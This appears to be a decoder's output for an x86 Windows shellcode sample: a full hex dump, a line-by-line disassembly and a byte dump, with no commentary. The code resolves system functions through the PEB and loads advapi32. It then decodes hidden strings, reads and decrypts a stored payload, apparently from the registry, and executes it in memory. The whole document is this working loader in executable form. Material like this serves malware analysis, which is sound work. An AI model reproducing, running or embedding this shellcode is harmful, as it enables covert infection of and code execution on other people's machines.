Decoded

1. Hex dump: b8 e6 00 00 00 c1 e8 02 c1 e0 02 8b ec 2b e0 8b fc 8b c8 33 c0 f3 aa 89 2c 24 8b ec e8 00 00 00 00 58 2d 21 10 40 00 89 85 a5 00 00 00 8d 35 47 12 40 00 03 b5 a5 00 00 00 8d 7d 04 b9 a1 00 00 00 f3 a4 64 8b 1d 30 00 00 00 8b 5b 0c 8b 5b 1c 8b 5b 08 8d 75 04 8d 7d 04 b9 06 00 00 00 ad 03 c3 ab e2 fa 66 c7 85 db 00 00 00 10 00 8d 95 c5 00 00 00 c7 02 61 00 64 00 c7 42 04 76 00 61 00 66 c7 85 dd 00 00 00 12 00 c7 42 08 70 00 69 00 c7 42 0c 33 00 32 00 66 c7 42 10 00 00 89 95 df 00 00 00 8d 85 bd 00 00 00 8d 95 db 00 00 00 50 52 6a 00 6a 00 ff 75 18 58 ff d0 85 c0 0f 85 80 01 00 00 8b 9d bd 00 00 00 b9 02 00 00 00 ad 03 c3 ab e2 fa 8b 5d 30 8d 75 34 8b fe b9 60 00 00 00 ac 32 c3 aa fe c3 e2 f8 8d 85 a9 00 00 00 8d 75 34 50 56 ff 75 28 ff 75 1c 58 ff d0 85 c0 0f 85 3e 01 00 00 8d 85 b1 00 00 00 8d 55 2c 6a 04 68 00 30 00 00 52 6a 00 50 6a ff ff 75 10 58 ff d0 8d b5 94 00 00 00 8b fe b9 11 00 00 00 ac 32 c3 aa fe c3 e2 f8 8d 45 2c 8d b5 94 00 00 00 50 ff b5 b1 00 00 00 6a 00 6a 00 56 ff b5 a9 00 00 00 ff 75 20 58 ff d0 85 c0 0f 85 e4 00 00 00 ff b5 a9 00 00 00 ff 75 14 58 ff d0 8b b5 b1 00 00 00 ad 93 ad 33 c3 89 85 ad 00 00 00 50 ad 33 c3 89 85 b5 00 00 00 8d 85 b9 00 00 00 8d 95 ad 00 00 00 6a 04 68 00 30 00 00 52 6a 00 50 6a ff ff 75 10 58 ff d0 58 8b bd b9 00 00 00 33 d2 b9 04 00 00 00 f7 f1 91 ad 33 c3 43 ab e2 f9 85 d2 74 09 87 ca ac 32 c3 43 aa e2 f9 8b 85 ad 00 00 00 c1 e0 03 89 85 c1 00 00 00 6a 00 6a 00 ff b5 c1 00 00 00 6a 00 6a 00 68 02 00 04 00 ff 75 08 58 ff d0 ff b5 c1 00 00 00 6a 08 50 ff 75 04 58 ff d0 89 85 bd 00 00 00 8d 85 c1 00 00 00 50 ff b5 ad 00 00 00 ff b5 b9 00 00 00 ff b5 c1 00 00 00 ff b5 bd 00 00 00 68 02 01 00 00 ff 75 0c 58 ff d0 85 c0 75 0e 8b 85 bd 00 00 00 03 85 b5 00 00 00 ff d0 8b 65 00 c3 d6 2d 05 00 3e 29 06 00 7d 53 0b 00 d8 52 04 00 c8 54 04 00 b8 22 06 00 15 cc 00 00 ef 48 01 00 00 00 00 00 01 00 00 80 04 e0 00 00 35 00 00 00 66 79 71 6c 6e 7b 69 79 61 73 56 23 33 2d 30 2b 23 32 1b 1f 20 24 2f 23 3a 3d 13 13 24 20 21 31 3b 22 01 3d 2b 29 32 33 33 02 1a 18 11 0e 0c 16 00 14 3b 2b 25 39 22 28 31 15 5f 44 47 46 41 4c 34 46 5a 3d 3b 43 4a 51 3c 3f 47 b2 ac b4 c7 c2 b6 ab c1 ce bb cc b9 cf c8 ba ca d6 d5 a7 ee 94 a4 d7 a6 af a1 a2 da a4 d9 ab a8 e3 96 e7 90 95 a5 00
2. 0x00000000 b8e6000000 mov eax,230
3. 0x00000005 c1e802 shr eax,2
4. 0x00000008 c1e002 shl eax,2
5. 0x0000000b 8bec mov ebp,esp
6. 0x0000000d 2be0 sub esp,eax
7. 0x0000000f 8bfc mov edi,esp
8. 0x00000011 8bc8 mov ecx,eax
9. 0x00000013 33c0 xor eax,eax
10. 0x00000015 f3aa rep: stosb
11. 0x00000017 892c24 mov dword [esp],ebp
12. 0x0000001a 8bec mov ebp,esp
13. 0x0000001c e800000000 call 0x00000021
14. 0x00000021 58 pop eax
15. 0x00000022 2d21104000 sub eax,0x00401021
16. 0x00000027 8985a5000000 mov dword [ebp + 165],eax
17. 0x0000002d 8d3547124000 lea esi,dword [0x00401247]
18. 0x00000033 03b5a5000000 add esi,dword [ebp + 165]
19. 0x00000039 8d7d04 lea edi,dword [ebp + 4]
20. 0x0000003c b9a1000000 mov ecx,161
21. 0x00000041 f3a4 rep: movsb
22. 0x00000043 648b1d30000000 fs: mov ebx,dword [0x00000030]
23. 0x0000004a 8b5b0c mov ebx,dword [ebx + 12]
24. 0x0000004d 8b5b1c mov ebx,dword [ebx + 28]
25. 0x00000050 8b5b08 mov ebx,dword [ebx + 8]
26. 0x00000053 8d7504 lea esi,dword [ebp + 4]
27. 0x00000056 8d7d04 lea edi,dword [ebp + 4]
28. 0x00000059 b906000000 mov ecx,6
29. 0x0000005e ad lodsd
30. 0x0000005f 03c3 add eax,ebx
31. 0x00000061 ab stosd
32. 0x00000062 e2fa loop 0x0000005e
33. 0x00000064 66c785db0000001000 mov word [ebp + 219],16
34. 0x0000006d 8d95c5000000 lea edx,dword [ebp + 197]
35. 0x00000073 c70261006400 mov dword [edx],0x00640061--> 'da'
36. 0x00000079 c7420476006100 mov dword [edx + 4],0x00610076--> 'av'
37. 0x00000080 66c785dd0000001200 mov word [ebp + 221],18
38. 0x00000089 c7420870006900 mov dword [edx + 8],0x00690070--> 'ip'
39. 0x00000090 c7420c33003200 mov dword [edx + 12],0x00320033--> '23'
40. 0x00000097 66c742100000 mov word [edx + 16],0
41. 0x0000009d 8995df000000 mov dword [ebp + 223],edx
42. 0x000000a3 8d85bd000000 lea eax,dword [ebp + 189]
43. 0x000000a9 8d95db000000 lea edx,dword [ebp + 219]
44. 0x000000af 50 push eax
45. 0x000000b0 52 push edx
46. 0x000000b1 6a00 push 0
47. 0x000000b3 6a00 push 0
48. 0x000000b5 ff7518 push dword [ebp + 24]
49. 0x000000b8 58 pop eax
50. 0x000000b9 ffd0 call eax
51. 0x000000bb 85c0 test eax,eax
52. 0x000000bd 0f8580010000 jnz 0x00000243
53. 0x000000c3 8b9dbd000000 mov ebx,dword [ebp + 189]
54. 0x000000c9 b902000000 mov ecx,2
55. 0x000000ce ad lodsd
56. 0x000000cf 03c3 add eax,ebx
57. 0x000000d1 ab stosd
58. 0x000000d2 e2fa loop 0x000000ce
59. 0x000000d4 8b5d30 mov ebx,dword [ebp + 48]
60. 0x000000d7 8d7534 lea esi,dword [ebp + 52]
61. 0x000000da 8bfe mov edi,esi
62. 0x000000dc b960000000 mov ecx,96
63. 0x000000e1 ac lodsb
64. 0x000000e2 32c3 xor al,bl
65. 0x000000e4 aa stosb
66. 0x000000e5 fec3 inc bl
67. 0x000000e7 e2f8 loop 0x000000e1
68. 0x000000e9 8d85a9000000 lea eax,dword [ebp + 169]
69. 0x000000ef 8d7534 lea esi,dword [ebp + 52]
70. 0x000000f2 50 push eax
71. 0x000000f3 56 push esi
72. 0x000000f4 ff7528 push dword [ebp + 40]
73. 0x000000f7 ff751c push dword [ebp + 28]
74. 0x000000fa 58 pop eax
75. 0x000000fb ffd0 call eax
76. 0x000000fd 85c0 test eax,eax
77. 0x000000ff 0f853e010000 jnz 0x00000243
78. 0x00000105 8d85b1000000 lea eax,dword [ebp + 177]
79. 0x0000010b 8d552c lea edx,dword [ebp + 44]
80. 0x0000010e 6a04 push 4
81. 0x00000110 6800300000 push 0x00003000
82. 0x00000115 52 push edx
83. 0x00000116 6a00 push 0
84. 0x00000118 50 push eax
85. 0x00000119 6aff push 255
86. 0x0000011b ff7510 push dword [ebp + 16]
87. 0x0000011e 58 pop eax
88. 0x0000011f ffd0 call eax
89. 0x00000121 8db594000000 lea esi,dword [ebp + 148]
90. 0x00000127 8bfe mov edi,esi
91. 0x00000129 b911000000 mov ecx,17
92. 0x0000012e ac lodsb
93. 0x0000012f 32c3 xor al,bl
94. 0x00000131 aa stosb
95. 0x00000132 fec3 inc bl
96. 0x00000134 e2f8 loop 0x0000012e
97. 0x00000136 8d452c lea eax,dword [ebp + 44]
98. 0x00000139 8db594000000 lea esi,dword [ebp + 148]
99. 0x0000013f 50 push eax
100. 0x00000140 ffb5b1000000 push dword [ebp + 177]
101. 0x00000146 6a00 push 0
102. 0x00000148 6a00 push 0
103. 0x0000014a 56 push esi
104. 0x0000014b ffb5a9000000 push dword [ebp + 169]
105. 0x00000151 ff7520 push dword [ebp + 32]
106. 0x00000154 58 pop eax
107. 0x00000155 ffd0 call eax
108. 0x00000157 85c0 test eax,eax
109. 0x00000159 0f85e4000000 jnz 0x00000243
110. 0x0000015f ffb5a9000000 push dword [ebp + 169]
111. 0x00000165 ff7514 push dword [ebp + 20]
112. 0x00000168 58 pop eax
113. 0x00000169 ffd0 call eax
114. 0x0000016b 8bb5b1000000 mov esi,dword [ebp + 177]
115. 0x00000171 ad lodsd
116. 0x00000172 93 xchg eax,ebx
117. 0x00000173 ad lodsd
118. 0x00000174 33c3 xor eax,ebx
119. 0x00000176 8985ad000000 mov dword [ebp + 173],eax
120. 0x0000017c 50 push eax
121. 0x0000017d ad lodsd
122. 0x0000017e 33c3 xor eax,ebx
123. 0x00000180 8985b5000000 mov dword [ebp + 181],eax
124. 0x00000186 8d85b9000000 lea eax,dword [ebp + 185]
125. 0x0000018c 8d95ad000000 lea edx,dword [ebp + 173]
126. 0x00000192 6a04 push 4
127. 0x00000194 6800300000 push 0x00003000
128. 0x00000199 52 push edx
129. 0x0000019a 6a00 push 0
130. 0x0000019c 50 push eax
131. 0x0000019d 6aff push 255
132. 0x0000019f ff7510 push dword [ebp + 16]
133. 0x000001a2 58 pop eax
134. 0x000001a3 ffd0 call eax
135. 0x000001a5 58 pop eax
136. 0x000001a6 8bbdb9000000 mov edi,dword [ebp + 185]
137. 0x000001ac 33d2 xor edx,edx
138. 0x000001ae b904000000 mov ecx,4
139. 0x000001b3 f7f1 div eax,ecx
140. 0x000001b5 91 xchg eax,ecx
141. 0x000001b6 ad lodsd
142. 0x000001b7 33c3 xor eax,ebx
143. 0x000001b9 43 inc ebx
144. 0x000001ba ab stosd
145. 0x000001bb e2f9 loop 0x000001b6
146. 0x000001bd 85d2 test edx,edx
147. 0x000001bf 7409 jz 0x000001ca
148. 0x000001c1 87ca xchg edx,ecx
149. 0x000001c3 ac lodsb
150. 0x000001c4 32c3 xor al,bl
151. 0x000001c6 43 inc ebx
152. 0x000001c7 aa stosb
153. 0x000001c8 e2f9 loop 0x000001c3
154. 0x000001ca 8b85ad000000 mov eax,dword [ebp + 173]
155. 0x000001d0 c1e003 shl eax,3
156. 0x000001d3 8985c1000000 mov dword [ebp + 193],eax
157. 0x000001d9 6a00 push 0
158. 0x000001db 6a00 push 0
159. 0x000001dd ffb5c1000000 push dword [ebp + 193]
160. 0x000001e3 6a00 push 0
161. 0x000001e5 6a00 push 0
162. 0x000001e7 6802000400 push 0x00040002
163. 0x000001ec ff7508 push dword [ebp + 8]
164. 0x000001ef 58 pop eax
165. 0x000001f0 ffd0 call eax
166. 0x000001f2 ffb5c1000000 push dword [ebp + 193]
167. 0x000001f8 6a08 push 8
168. 0x000001fa 50 push eax
169. 0x000001fb ff7504 push dword [ebp + 4]
170. 0x000001fe 58 pop eax
171. 0x000001ff ffd0 call eax
172. 0x00000201 8985bd000000 mov dword [ebp + 189],eax
173. 0x00000207 8d85c1000000 lea eax,dword [ebp + 193]
174. 0x0000020d 50 push eax
175. 0x0000020e ffb5ad000000 push dword [ebp + 173]
176. 0x00000214 ffb5b9000000 push dword [ebp + 185]
177. 0x0000021a ffb5c1000000 push dword [ebp + 193]
178. 0x00000220 ffb5bd000000 push dword [ebp + 189]
179. 0x00000226 6802010000 push 258
180. 0x0000022b ff750c push dword [ebp + 12]
181. 0x0000022e 58 pop eax
182. 0x0000022f ffd0 call eax
183. 0x00000231 85c0 test eax,eax
184. 0x00000233 750e jnz 0x00000243
185. 0x00000235 8b85bd000000 mov eax,dword [ebp + 189]
186. 0x0000023b 0385b5000000 add eax,dword [ebp + 181]
187. 0x00000241 ffd0 call eax
188. 0x00000243 8b6500 mov esp,dword [ebp]
189. 0x00000246 c3 ret
190.  
191. Byte Dump:
192. .............+.....3....,$.......X-!.@........5G.@........}........d..0....[.[..[..u..}............f................a.d..B.v.a.f.........B.p.i..B3.2.f.B.....................PRj.j..u.X............................]0.u4...`....2.............u4PV.u(.u.X......>..........U,j.h.0..Rj.Pj..u.X................2.......E,......P......j.j.V.......uX.................u.X...........3.......P.3...................j.h.0..Rj.Pj..u.X..X......3..........3.C.....t...2.C..................j.j.......j.j.h.....u.X........j.P.u.X..............P........................h.....uX....u................e...-..>)..}S..R...T...".......H..............5...fyqln{iyasV#3-0+#2..$/#:=..$!1;".=+)233........;+%9"(1._DGFAL4FZ=;CJQ<?G.......................................